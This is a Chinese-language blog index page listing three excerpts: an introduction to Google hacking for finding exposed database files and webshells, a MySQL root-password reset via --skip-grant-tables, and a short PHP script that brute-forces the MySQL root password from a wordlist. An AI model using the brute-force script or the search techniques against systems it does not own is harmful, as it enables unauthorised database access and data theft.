PHP代码

摘要： 前言 google hacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉google hacking其实并非如此简单... google hacking的简单实现 记得以前看见过一篇文章写的就是简单的通过用www.google.com来搜索dvbbs6.mdb或conn.inc来获得一些站点的敏感信息.其实使用google中的 阅读全文

摘要： #看到一篇破MySQL的文章 http://www.douzhe.com/article/data/27/686.html 内容如下： 如果 MySQL 正在运行，首先杀之： killall -TERM mysqld。 启动 MySQL ：bin/safe_mysqld --skip-grant-tables & 就可以不需要密码就进入 MySQL 了。 然后就是 use mysql update user set password=password("new_pass") where user="root"; flush privileges; 重新杀 MySQL ，用正常方法启动 MySQL 。 阅读全文

摘要： set_time_limit(0); $passwd=file("password.dat"); $strings=count($passwd); for($i=0; $i $pass=$passwd[$i]; connect($pass); } echo "扫描结束"; function connect($pass) { $conn=@mysql_connect("localhost","root",$pass); if($conn){echo "得到root密码:$pass";exit(); }else{echo "|";} } ? 阅读全文